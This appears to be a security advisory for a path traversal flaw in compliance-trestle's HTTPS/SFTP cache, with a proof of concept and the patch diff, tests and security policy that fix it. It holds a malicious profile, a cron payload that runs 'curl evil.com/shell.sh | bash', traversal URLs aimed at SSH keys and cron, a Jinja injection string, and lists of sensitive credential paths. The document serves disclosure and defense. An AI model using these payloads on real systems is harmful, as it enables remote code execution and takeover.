VYPR
High severityGHSA Advisory· Published May 27, 2026· Updated May 27, 2026

compliance-trestle Remote Fetching Mechanism has an Arbitrary File Write via Cache Path Traversal

CVE-2026-45725

Description

Summary

The compliance-trestle library's remote fetching cache mechanism (HTTPSFetcher and SFTPFetcher) constructs the local cache file path from the URL path component without sanitizing path traversal sequences (../). When a remote OSCAL profile references a URL with traversal in its path, the HTTP response body is written to a location outside the intended cache directory, enabling arbitrary file write with attacker-controlled content to the filesystem.

Attack chain: Malicious OSCAL profile → HTTPS fetch → cache path traversal → arbitrary file write → RCE (via cron, SSH keys, etc.)

Affected

Component

Repository: https://github.com/IBM/compliance-trestle File: trestle/core/remote/cache.py (lines 259-266 for HTTPSFetcher, lines 328-333 for SFTPFetcher) Version: v4.0.2 (latest as of 2026-04-30)

Vulnerable

Code

cache.py:259-266 — HTTPSFetcher cache path construction

class HTTPSFetcher(FetcherBase):
    def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
        # ...
        u = parse.urlparse(self._uri)
        # ...
        if u.hostname is None:
            raise TrestleError(f'Cache request for {self._uri} requires hostname')
        https_cached_dir = self._trestle_cache_path / u.hostname
        # ❌ path_parent preserves ../ sequences from URL
        path_parent = pathlib.Path(u.path[re.search('[^/\\\\]', u.path).span()[0] :]).parent
        https_cached_dir = https_cached_dir / path_parent
        https_cached_dir.mkdir(parents=True, exist_ok=True)  # ❌ Creates dirs outside cache
        self._cached_object_path = https_cached_dir / pathlib.Path(pathlib.Path(u.path).name)

cache.py:285-295 — Content written to traversed path

    def _do_fetch(self) -> None:
        # ...
        response = requests.get(self._url, auth=auth, verify=verify, timeout=30)
        if response.status_code == 200:
            result = response.text  # ❌ Attacker-controlled content
            self._cached_object_path.write_text(result)  # ❌ Written to arbitrary path

cache.py:328-333 — SFTPFetcher (identical pattern)

class SFTPFetcher(FetcherBase):
    def __init__(self, ...):
        # Identical path construction — same vulnerability
        sftp_cached_dir = self._trestle_cache_path / u.hostname
        path_parent = pathlib.Path(u.path[re.search('[^/\\\\]', u.path).span()[0] :]).parent
        sftp_cached_dir = sftp_cached_dir / path_parent
        sftp_cached_dir.mkdir(parents=True, exist_ok=True)
        self._cached_object_path = sftp_cached_dir / pathlib.Path(pathlib.Path(u.path).name)

Root Cause: 1. urlparse("https://evil.com/../../../tmp/pwned.json").path = /../../../tmp/pwned.json — preserves ../ 2. pathlib.Path(u.path).parent preserves traversal sequences 3. cache_dir / hostname / "../../../../../../tmp" resolves outside cache 4. mkdir(parents=True, exist_ok=True) creates intermediate directories 5. write_text(response.text) writes attacker-controlled content to traversed path 6. **No is_relative_to() boundary check** on the resolved path

Steps to

Reproduce

Prerequisites

pip install compliance-trestle==4.0.2

PoC: Malicious OSCAL Profile

# malicious_profile.yaml — arbitrary file write via cache traversal
profile:
  uuid: "550e8400-e29b-41d4-a716-446655440000"
  metadata:
    title: "Malicious Profile"
    version: "1.0"
    last-modified: "2024-01-01T00:00:00+00:00"
    oscal-version: "1.0.4"
  imports:
    - href: "https://evil.com/../../../../../../../tmp/trestle_pwned.json"

PoC: Cache Path Traversal Simulation

#!/usr/bin/env python3
"""PoC: Cache path traversal → arbitrary file write"""
import os, re, tempfile, shutil
from pathlib import Path
from urllib.parse import urlparse

# Simulate trestle cache behavior (cache.py:259-266)
trestle_root = Path(tempfile.mkdtemp(prefix="trestle_poc_"))
cache_dir = trestle_root / ".trestle" / ".cache"
cache_dir.mkdir(parents=True, exist_ok=True)

evil_url = "https://evil.com/../../../../../../../tmp/trestle_pwned.json"
u = urlparse(evil_url)

# Exact trestle code path
cached_dir = cache_dir / u.hostname
m = re.search(r'[^/\\\\]', u.path)
path_parent = Path(u.path[m.span()[0]:]).parent
cached_dir = cached_dir / path_parent
cached_dir.mkdir(parents=True, exist_ok=True)
cached_file = cached_dir / Path(Path(u.path).name)

print(f"Cache dir: {cache_dir}")
print(f"Resolved write target: {cached_file.resolve()}")
# Output: /tmp/trestle_pwned.json ← OUTSIDE cache directory!

# Write attacker content
attacker_payload = '*/5 * * * * root /bin/bash -c "id > /tmp/rce_proof"'
cached_file.write_text(attacker_payload)
print(f"Written: {cached_file.resolve().read_text()}")

# Cleanup
os.remove(str(cached_file.resolve()))
shutil.rmtree(str(trestle_root))

Expected: Write confined to .trestle/.cache/ directory Actual: File written to /tmp/trestle_pwned.json (arbitrary filesystem location)

Remediation

Fix for

HTTPSFetcher (cache.py:259-266):

class HTTPSFetcher(FetcherBase):
    def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
        # ...
        u = parse.urlparse(self._uri)
        https_cached_dir = self._trestle_cache_path / u.hostname

        # ✅ Sanitize path: remove traversal sequences
        safe_path = pathlib.PurePosixPath(u.path).parts
        safe_path = [p for p in safe_path if p != '..' and p != '/']
        path_parent = pathlib.Path(*safe_path[:-1]) if len(safe_path) > 1 else pathlib.Path('.')

        https_cached_dir = https_cached_dir / path_parent
        https_cached_dir.mkdir(parents=True, exist_ok=True)
        self._cached_object_path = https_cached_dir / safe_path[-1]

        # ✅ Boundary check
        if not self._cached_object_path.resolve().is_relative_to(self._trestle_cache_path.resolve()):
            raise TrestleError(
                f"Cache path traversal blocked: URL '{uri}' resolves to "
                f"'{self._cached_object_path.resolve()}' outside cache directory"
            )

Same fix required for SFTPFetcher at lines 328-333.

References

  • CWE-22: https://cwe.mitre.org/data/definitions/22.html
  • CWE-73: https://cwe.mitre.org/data/definitions/73.html
  • compliance-trestle: https://github.com/IBM/compliance-trestle

Impact

1. Cron Job Injection → Remote Code Execution

# Profile that writes a cron job
imports:
  - href: "https://evil.com/../../../../../../../etc/cron.d/backdoor"

Attacker's server responds with: `` * * * * * root /bin/bash -c 'curl https://evil.com/shell.sh | bash' ``

2. SSH Authorized Keys Injection

imports:
  - href: "https://evil.com/../../../../../../../root/.ssh/authorized_keys"

Attacker's server responds with their SSH public key.

3. Config File Overwrite

imports:
  - href: "https://evil.com/../../../../../../../etc/nginx/conf.d/evil.conf"

4. Python Path Hijacking

Write malicious .py file to a location on sys.path for code execution on next import.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Path traversal in compliance-trestle's remote cache allows arbitrary file write via malicious OSCAL profile, leading to RCE.

Vulnerability

The compliance-trestle library (v4.0.2) contains a path traversal vulnerability in its remote fetching cache mechanism, specifically in HTTPSFetcher and SFTPFetcher classes within trestle/core/remote/cache.py (lines 259-266 and 328-333) [1][2]. The cache path is constructed from the URL path component without sanitizing ../ sequences, allowing the response body to be written outside the intended cache directory [3].

Exploitation

An attacker can craft a malicious OSCAL profile that references a URL containing path traversal sequences (e.g., https://attacker.com/../../../etc/cron.d/malicious). When the library fetches this URL, the HTTP response body is written to the traversed path on the filesystem [2][3]. No authentication is required if the library processes untrusted profiles.

Impact

Successful exploitation results in arbitrary file write with attacker-controlled content. This can be leveraged for remote code execution by overwriting cron jobs, SSH authorized keys, or other system files [2][3]. The attacker gains the ability to execute arbitrary commands on the affected system.

Mitigation

The vulnerability is fixed in commits 89f4e53d159e8ff901da4d7c3b51c9556bd32ec0 and 9abc492329fcc8d0557182317de9bde854385da3 [1][4]. The fix introduces PathSecurityValidator to block path traversal in URL paths and local file paths. Users should update to the latest version containing these commits. No workaround is available. The CVE is not listed in CISA's Known Exploited Vulnerabilities catalog.

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
compliance-trestlePyPI
>= 4.0.0, < 4.0.34.0.3
compliance-trestlePyPI
< 3.12.23.12.2

Affected products

2

Patches

2
9abc492329fc

Merge pull request #2239 from oscal-compass/security/path-traversal-v3

https://github.com/oscal-compass/compliance-trestleChris ButlerMay 21, 2026via ghsa-ref
8 files changed · +1527 47
  • README.md+4 0 modified
    @@ -106,6 +106,10 @@ Please refer to the community [README](https://github.com/oscal-compass/communit
     
     Our project welcomes external contributions. Please consult [contributing](https://oscal-compass.github.io/compliance-trestle/latest/contributing/mkdocs_contributing/) to get started.
     
    +## Security
    +
    +For information about security features, best practices, and how to report security vulnerabilities, please see our [Security Policy](SECURITY.md).
    +
     ## Code of Conduct
     
     Participation in the OSCAL Compass community is governed by the [Code of Conduct](https://github.com/oscal-compass/community/blob/main/CODE_OF_CONDUCT.md).
    
  • SECURITY.md+111 0 added
    @@ -0,0 +1,111 @@
    +# Security Policy
    +
    +## Reporting Security Vulnerabilities
    +
    +For information about how to report security vulnerabilities, please see the [OSCAL Compass Community Security Policy](https://github.com/oscal-compass/community/blob/main/SECURITY.md).
    +
    +## Security Features
    +
    +### SSRF (Server-Side Request Forgery) Protection
    +
    +Compliance-trestle implements comprehensive SSRF protection when fetching remote OSCAL content via HTTPS or SFTP. This protection uses a **two-tier defense system** to prevent malicious actors from exploiting the fetching mechanism to access internal resources or cloud metadata endpoints.
    +
    +#### Tier 1: Always Blocked (Zero Tolerance)
    +
    +The following address ranges and endpoints are **always blocked** regardless of configuration, as they have zero legitimate use for OSCAL content fetching:
    +
    +- **Loopback addresses**: `127.0.0.0/8` (IPv4), `::1/128` (IPv6)
    +- **Link-local addresses**: `169.254.0.0/16` (IPv4), `fe80::/10` (IPv6)
    +- **Cloud metadata endpoints**:
    +  - `169.254.169.254` (AWS, Azure, GCP)
    +  - `metadata.google.internal` (GCP)
    +  - `metadata.azure.com` (Azure alternative)
    +  - `100.100.100.200` (Alibaba Cloud)
    +
    +These ranges are blocked to prevent:
    +
    +- Access to localhost services
    +- Exploitation of cloud metadata endpoints to steal credentials
    +- Access to link-local services
    +
    +#### Tier 2: Optionally Blocked (Configurable)
    +
    +RFC 1918 private IP ranges are **allowed by default** to support legitimate use cases such as private GitLab instances or internal OSCAL repositories:
    +
    +- `10.0.0.0/8`
    +- `172.16.0.0/12`
    +- `192.168.0.0/16`
    +- `fc00::/7` (IPv6 unique local)
    +
    +**To block private IP ranges**, set the environment variable:
    +
    +```bash
    +export TRESTLE_BLOCK_PRIVATE_IPS=true
    +```
    +
    +When private IPs are allowed (default), trestle logs a warning when accessing them to maintain visibility.
    +
    +#### Domain Allowlist (Optional)
    +
    +For additional security, you can restrict fetching to specific domains by configuring an allowed domains list. When configured, only URLs from the specified domains will be permitted.
    +
    +### Path Traversal Protection
    +
    +Trestle implements multiple layers of path traversal protection:
    +
    +1. **URL Path Validation**: Blocks `..` sequences in URL paths to prevent directory traversal
    +1. **Cache Path Validation**: Ensures cached files remain within the designated cache directory
    +1. **Workspace Boundary Enforcement**: Validates that local file operations stay within the trestle workspace
    +1. **Sensitive File Protection**: Blocks access to sensitive system files even when outside-workspace access is allowed:
    +   - `/etc/passwd`, `/etc/shadow`, `/etc/group`, `/etc/sudoers`
    +   - SSH keys (`.ssh/`)
    +   - Cloud credentials (`.aws/`, `.docker/`, `.kube/`)
    +   - System logs (`/var/log/`)
    +   - Database files (`/var/lib/mysql/`)
    +   - Windows system files (`C:\Windows\System32\`, credentials)
    +   - Process information (`/proc/self/environ`)
    +
    +### Scheme Restrictions
    +
    +Only HTTPS and SFTP schemes are allowed for remote URLs. HTTP, FTP, and other protocols are rejected to ensure encrypted transport.
    +
    +### Port Restrictions
    +
    +By default, only standard ports are allowed:
    +
    +- HTTPS: port 443
    +- SFTP: port 22
    +
    +Non-standard ports are blocked unless explicitly configured.
    +
    +## Security Best Practices
    +
    +When using compliance-trestle to fetch remote OSCAL content:
    +
    +1. **Use HTTPS URLs** from trusted sources
    +1. **Enable private IP blocking** (`TRESTLE_BLOCK_PRIVATE_IPS=true`) in production environments unless you specifically need to access private repositories
    +1. **Configure domain allowlists** when fetching from a known set of trusted domains
    +1. **Monitor logs** for warnings about private IP access
    +1. **Keep trestle updated** to receive the latest security fixes
    +1. **Review fetched content** before using it in production compliance workflows
    +
    +## Security Testing
    +
    +The SSRF and path traversal protections are comprehensively tested with 100% code coverage. Tests include:
    +
    +- Blocking of all Tier 1 addresses and endpoints
    +- Configurable blocking of Tier 2 private ranges
    +- Path traversal attack vectors
    +- Sensitive file access attempts
    +- Real-world attack scenarios from security advisories
    +
    +## Version History
    +
    +- **v4.x**: Introduced two-tier SSRF protection system (GHSA-w76h-q7c6-jpjp fix)
    +- **v3.x and earlier**: Limited SSRF protection (vulnerable)
    +
    +## References
    +
    +- [GHSA-w76h-q7c6-jpjp](https://github.com/oscal-compass/compliance-trestle/security/advisories/GHSA-w76h-q7c6-jpjp) - SSRF vulnerability advisory
    +- [OWASP SSRF Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)
    +- [CWE-918: Server-Side Request Forgery (SSRF)](https://cwe.mitre.org/data/definitions/918.html)
    
  • tests/trestle/core/commands/author/jinja_cmd_test.py+111 1 modified
    @@ -16,12 +16,16 @@
     import os
     import pathlib
     import shutil
    +from types import SimpleNamespace
    +
    +import pytest
     
     from _pytest.monkeypatch import MonkeyPatch
     
     from tests.test_utils import execute_command_and_assert, setup_for_ssp
     
    -from trestle.core.commands.author.jinja import _number_captions
    +from trestle.common.err import TrestleError
    +from trestle.core.commands.author.jinja import JinjaCmd, _number_captions
     from trestle.core.commands.author.ssp import SSPGenerate
     from trestle.core.markdown.docs_markdown_node import DocsMarkdownNode
     
    @@ -295,3 +299,109 @@ def test_jinja_with_template_only(
             node1 = tree.get_node_for_key('# A')
             node2 = tree.get_node_for_key('# C')
             assert node1.subnodes[0].key == node2.subnodes[0].key
    +
    +
    +def test_jinja_path_traversal_protection(
    +    testdata_dir: pathlib.Path, tmp_trestle_dir: pathlib.Path, monkeypatch: MonkeyPatch
    +) -> None:
    +    """Test that path traversal attacks are blocked in jinja command."""
    +    from trestle.core.remote.security import PathSecurityValidator
    +
    +    # Test path validation directly to ensure 100% coverage of the validation code
    +    # Test 1: Path traversal with ../ should fail
    +    with pytest.raises(TrestleError) as exc_info:
    +        output_file = tmp_trestle_dir / '../../../etc/passwd'
    +        PathSecurityValidator.validate_local_path(output_file, tmp_trestle_dir)
    +    assert 'Security violation' in str(exc_info.value)
    +    assert 'Path traversal blocked' in str(exc_info.value)
    +
    +    # Test 2: Path traversal with multiple ../ should fail
    +    with pytest.raises(TrestleError) as exc_info:
    +        output_file = tmp_trestle_dir / 'subdir/../../poc.txt'
    +        PathSecurityValidator.validate_local_path(output_file, tmp_trestle_dir)
    +    assert 'Security violation' in str(exc_info.value)
    +
    +    # Test 3: Absolute path should fail
    +    with pytest.raises(TrestleError) as exc_info:
    +        output_file = pathlib.Path('/tmp/attack.md')
    +        PathSecurityValidator.validate_local_path(output_file, tmp_trestle_dir)
    +    assert 'Security violation' in str(exc_info.value)
    +
    +    # Test 4: Complex traversal should fail
    +    with pytest.raises(TrestleError) as exc_info:
    +        output_file = tmp_trestle_dir / 'a/b/c/../../../../etc/passwd'
    +        PathSecurityValidator.validate_local_path(output_file, tmp_trestle_dir)
    +    assert 'Security violation' in str(exc_info.value)
    +
    +    # Test 5: Valid relative path should succeed
    +    output_file = tmp_trestle_dir / 'output/valid.md'
    +    PathSecurityValidator.validate_local_path(output_file, tmp_trestle_dir)  # Should not raise
    +
    +
    +def test_jinja_docs_profile_path_traversal_protection(tmp_trestle_dir: pathlib.Path) -> None:
    +    """Test that path traversal attacks are blocked in jinja docs-profile mode."""
    +    from trestle.core.remote.security import PathSecurityValidator
    +
    +    # Test validation for multi-file output paths
    +    # Test 1: Path traversal in output directory should fail
    +    with pytest.raises(TrestleError) as exc_info:
    +        output_file = tmp_trestle_dir / '../../../etc/ac-1.md'
    +        PathSecurityValidator.validate_local_path(output_file, tmp_trestle_dir)
    +    assert 'Security violation' in str(exc_info.value)
    +    assert 'Path traversal blocked' in str(exc_info.value)
    +
    +    # Test 2: Complex path traversal should fail
    +    with pytest.raises(TrestleError) as exc_info:
    +        output_file = tmp_trestle_dir / 'controls/../../tmp/ac-1.md'
    +        PathSecurityValidator.validate_local_path(output_file, tmp_trestle_dir)
    +    assert 'Security violation' in str(exc_info.value)
    +
    +    # Test 3: Directory creation path traversal should fail
    +    with pytest.raises(TrestleError) as exc_info:
    +        group_dir = tmp_trestle_dir / '../../../etc/malicious'
    +        PathSecurityValidator.validate_local_path(group_dir, tmp_trestle_dir)
    +    assert 'Security violation' in str(exc_info.value)
    +
    +    # Test 4: Valid relative path should succeed
    +    output_file = tmp_trestle_dir / 'controls_output/ac/ac-1.md'
    +    PathSecurityValidator.validate_local_path(output_file, tmp_trestle_dir)  # Should not raise
    +
    +
    +def test_render_template_does_not_recursively_evaluate_untrusted_data(tmp_path: pathlib.Path) -> None:
    +    """Test that rendered attacker-controlled data is not re-evaluated as Jinja."""
    +    template_path = tmp_path / 'template.j2'
    +    template_path.write_text('Title: {{ ssp.metadata.title }}', encoding='utf-8')
    +
    +    jinja_env = JinjaCmd._create_jinja_environment(tmp_path)
    +    template = jinja_env.get_template(template_path.name)
    +
    +    lut = {
    +        'ssp': SimpleNamespace(
    +            metadata=SimpleNamespace(title="{{ namespace.__init__.__globals__.os.system('touch poc.txt') }}")
    +        )
    +    }
    +
    +    output = JinjaCmd.render_template(template, lut, tmp_path)
    +
    +    assert output.startswith('Title: {{ namespace.__init__.__globals__.os.system(')
    +    assert 'touch poc.txt' in output
    +    assert '{{' in output
    +    assert '}}' in output
    +    assert '&' in output
    +    assert not (tmp_path / 'poc.txt').exists()
    +
    +
    +def test_render_template_supports_trusted_include(tmp_path: pathlib.Path) -> None:
    +    """Test that trusted template includes continue to work."""
    +    include_path = tmp_path / 'partial.j2'
    +    include_path.write_text('World', encoding='utf-8')
    +
    +    template_path = tmp_path / 'template.j2'
    +    template_path.write_text("Hello {% include 'partial.j2' %}", encoding='utf-8')
    +
    +    jinja_env = JinjaCmd._create_jinja_environment(tmp_path)
    +    template = jinja_env.get_template(template_path.name)
    +
    +    output = JinjaCmd.render_template(template, {}, tmp_path)
    +
    +    assert output == 'Hello World'
    
  • tests/trestle/core/remote/cache_security_test.py+711 0 added
    @@ -0,0 +1,711 @@
    +# -*- mode:python; coding:utf-8 -*-
    +
    +# Copyright (c) 2026 The OSCAL Compass Authors.
    +#
    +# Licensed under the Apache License, Version 2.0 (the "License");
    +# you may not use this file except in compliance with the License.
    +# You may obtain a copy of the License at
    +#
    +#     https://www.apache.org/licenses/LICENSE-2.0
    +#
    +# Unless required by applicable law or agreed to in writing, software
    +# distributed under the License is distributed on an "AS IS" BASIS,
    +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
    +# See the License for the specific language governing permissions and
    +# limitations under the License.
    +"""Security tests for cache path traversal vulnerabilities."""
    +
    +import pathlib
    +import socket
    +import sys
    +
    +import pytest
    +
    +import tests.test_utils as test_utils
    +
    +from trestle.common.err import TrestleError
    +from trestle.core.remote.cache import HTTPSFetcher, SFTPFetcher
    +from trestle.core.remote.security import PathSecurityValidator, URLSecurityValidator
    +
    +
    +class TestPathValidation:
    +    """Test path validation functions."""
    +
    +    def test_validate_url_path_normal(self) -> None:
    +        """Test that normal paths pass validation."""
    +        PathSecurityValidator.validate_url_path_for_cache('/normal/path.json')  # Should not raise
    +        PathSecurityValidator.validate_url_path_for_cache('/path/to/file.json')  # Should not raise
    +        PathSecurityValidator.validate_url_path_for_cache('/data/catalog.json')  # Should not raise
    +
    +    def test_validate_url_path_blocks_traversal(self) -> None:
    +        """Test that paths with .. are blocked."""
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            PathSecurityValidator.validate_url_path_for_cache('/../../../etc/passwd')
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            PathSecurityValidator.validate_url_path_for_cache('/path/../file.json')
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            PathSecurityValidator.validate_url_path_for_cache('/../file.json')
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            PathSecurityValidator.validate_url_path_for_cache('/../../../../../../tmp/pwned.json')
    +
    +
    +class TestPathSecurityValidator:
    +    """Test path security validation."""
    +
    +    def test_validate_cache_path_within_cache(self, tmp_path: pathlib.Path) -> None:
    +        """Test that valid paths within cache are accepted."""
    +        cache_root = tmp_path / '.trestle' / 'cache'
    +        cache_root.mkdir(parents=True)
    +
    +        # Valid path within cache
    +        valid_path = cache_root / 'example.com' / 'data' / 'file.json'
    +        PathSecurityValidator.validate_cache_path(valid_path, cache_root)  # Should not raise
    +
    +    def test_validate_cache_path_traversal_blocked(self, tmp_path: pathlib.Path) -> None:
    +        """Test that path traversal outside cache is blocked."""
    +        cache_root = tmp_path / '.trestle' / 'cache'
    +        cache_root.mkdir(parents=True)
    +
    +        # Attempt to traverse outside cache
    +        evil_path = cache_root / '..' / '..' / 'etc' / 'passwd'
    +
    +        with pytest.raises(TrestleError, match='Security violation.*path traversal blocked'):
    +            PathSecurityValidator.validate_cache_path(evil_path, cache_root)
    +
    +    def test_validate_cache_path_absolute_outside_blocked(self, tmp_path: pathlib.Path) -> None:
    +        """Test that absolute paths outside cache are blocked."""
    +        cache_root = tmp_path / '.trestle' / 'cache'
    +        cache_root.mkdir(parents=True)
    +
    +        # Absolute path outside cache
    +        evil_path = pathlib.Path('/tmp/pwned.json')
    +
    +        with pytest.raises(TrestleError, match='Security violation.*path traversal blocked'):
    +            PathSecurityValidator.validate_cache_path(evil_path, cache_root)
    +
    +    def test_validate_cache_path_unexpected_error(self, tmp_path: pathlib.Path, monkeypatch) -> None:
    +        """Test that unexpected errors during validation are caught and wrapped."""
    +        cache_root = tmp_path / '.trestle' / 'cache'
    +        cache_root.mkdir(parents=True)
    +
    +        valid_path = cache_root / 'example.com' / 'file.json'
    +
    +        # Mock relative_to() to raise an unexpected exception (not ValueError)
    +        def mock_relative_to(self, other, *args, **kwargs):
    +            # Raise a non-ValueError exception to trigger the generic except block
    +            raise RuntimeError('Unexpected filesystem error')
    +
    +        monkeypatch.setattr(pathlib.Path, 'relative_to', mock_relative_to)
    +
    +        with pytest.raises(TrestleError, match='Error validating cache path'):
    +            PathSecurityValidator.validate_cache_path(valid_path, cache_root)
    +
    +
    +class TestTrestleURIPathValidation:
    +    """Test trestle:// URI path validation."""
    +
    +    def test_validate_trestle_uri_path_normal(self) -> None:
    +        """Test that normal trestle:// URI paths pass validation."""
    +        PathSecurityValidator.validate_trestle_uri_path('catalogs/nist/catalog.json')
    +        PathSecurityValidator.validate_trestle_uri_path('profiles/fedramp/profile.json')
    +        PathSecurityValidator.validate_trestle_uri_path('components/mycomp/component.json')
    +
    +    def test_validate_trestle_uri_path_blocks_traversal(self) -> None:
    +        """Test that trestle:// URI paths with .. are blocked."""
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked.*trestle://'):
    +            PathSecurityValidator.validate_trestle_uri_path('../../etc/passwd')
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked.*trestle://'):
    +            PathSecurityValidator.validate_trestle_uri_path('catalogs/../../../etc/shadow')
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked.*trestle://'):
    +            PathSecurityValidator.validate_trestle_uri_path('../sensitive/file.json')
    +
    +
    +class TestLocalPathValidation:
    +    """Test local path validation."""
    +
    +    def test_validate_local_path_within_workspace(self, tmp_path: pathlib.Path) -> None:
    +        """Test that valid paths within trestle workspace are accepted."""
    +        trestle_root = tmp_path / 'trestle-workspace'
    +        trestle_root.mkdir(parents=True)
    +
    +        # Valid path within workspace
    +        valid_path = trestle_root / 'catalogs' / 'nist' / 'catalog.json'
    +        PathSecurityValidator.validate_local_path(valid_path, trestle_root)  # Should not raise
    +
    +    def test_validate_local_path_traversal_blocked(self, tmp_path: pathlib.Path) -> None:
    +        """Test that path traversal outside workspace is blocked."""
    +        trestle_root = tmp_path / 'trestle-workspace'
    +        trestle_root.mkdir(parents=True)
    +
    +        # Attempt to traverse outside workspace
    +        evil_path = trestle_root / '..' / '..' / 'etc' / 'passwd'
    +
    +        with pytest.raises(TrestleError, match='Security violation.*[Pp]ath traversal blocked'):
    +            PathSecurityValidator.validate_local_path(evil_path, trestle_root)
    +
    +    def test_validate_local_path_absolute_outside_blocked(self, tmp_path: pathlib.Path) -> None:
    +        """Test that absolute paths outside workspace are blocked."""
    +        trestle_root = tmp_path / 'trestle-workspace'
    +        trestle_root.mkdir(parents=True)
    +
    +        # Absolute path outside workspace
    +        evil_path = pathlib.Path('/tmp/pwned.json')
    +
    +        with pytest.raises(TrestleError, match='Security violation.*[Pp]ath traversal blocked'):
    +            PathSecurityValidator.validate_local_path(evil_path, trestle_root)
    +
    +    def test_validate_local_path_unexpected_error(self, tmp_path: pathlib.Path, monkeypatch) -> None:
    +        """Test that unexpected errors during validation are caught and wrapped."""
    +        trestle_root = tmp_path / 'trestle-workspace'
    +        trestle_root.mkdir(parents=True)
    +
    +        valid_path = trestle_root / 'catalogs' / 'file.json'
    +
    +        # Mock relative_to() to raise an unexpected exception (not ValueError)
    +        def mock_relative_to(self, other, *args, **kwargs):
    +            raise RuntimeError('Unexpected filesystem error')
    +
    +        monkeypatch.setattr(pathlib.Path, 'relative_to', mock_relative_to)
    +
    +        with pytest.raises(TrestleError, match='Error validating local path'):
    +            PathSecurityValidator.validate_local_path(valid_path, trestle_root)
    +
    +
    +class TestLocalFilePathValidation:
    +    """Test local file path validation with workspace boundaries and sensitive file checks."""
    +
    +    def test_validate_local_file_path_within_workspace(self, tmp_path: pathlib.Path) -> None:
    +        """Test that files within workspace are allowed."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        file_path = workspace / 'catalogs' / 'catalog.json'
    +        PathSecurityValidator.validate_local_file_path(workspace, file_path, allow_outside_workspace=False)
    +
    +    def test_validate_local_file_path_outside_workspace_blocked(self, tmp_path: pathlib.Path) -> None:
    +        """Test that files outside workspace are blocked when allow_outside_workspace=False."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        outside_file = tmp_path / 'outside.json'
    +
    +        with pytest.raises(TrestleError, match='Access to files outside the trestle workspace is not allowed'):
    +            PathSecurityValidator.validate_local_file_path(workspace, outside_file, allow_outside_workspace=False)
    +
    +    def test_validate_local_file_path_outside_workspace_allowed(self, tmp_path: pathlib.Path) -> None:
    +        """Test that non-sensitive files outside workspace are allowed when allow_outside_workspace=True."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        # Create a safe file outside workspace
    +        outside_file = tmp_path / 'safe_file.json'
    +        outside_file.touch()
    +
    +        # Should not raise
    +        PathSecurityValidator.validate_local_file_path(workspace, outside_file, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_etc_passwd(self, tmp_path: pathlib.Path) -> None:
    +        """Test that /etc/passwd is blocked even with allow_outside_workspace=True."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        passwd_path = pathlib.Path('/etc/passwd')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, passwd_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_etc_shadow(self, tmp_path: pathlib.Path) -> None:
    +        """Test that /etc/shadow is blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        shadow_path = pathlib.Path('/etc/shadow')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, shadow_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_etc_group(self, tmp_path: pathlib.Path) -> None:
    +        """Test that /etc/group is blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        group_path = pathlib.Path('/etc/group')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, group_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_etc_sudoers(self, tmp_path: pathlib.Path) -> None:
    +        """Test that /etc/sudoers is blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        sudoers_path = pathlib.Path('/etc/sudoers')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, sudoers_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_ssh_directory(self, tmp_path: pathlib.Path) -> None:
    +        """Test that .ssh directory is blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        ssh_path = pathlib.Path('/home/user/.ssh/id_rsa')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, ssh_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_aws_credentials(self, tmp_path: pathlib.Path) -> None:
    +        """Test that .aws credentials are blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        aws_path = pathlib.Path('/home/user/.aws/credentials')
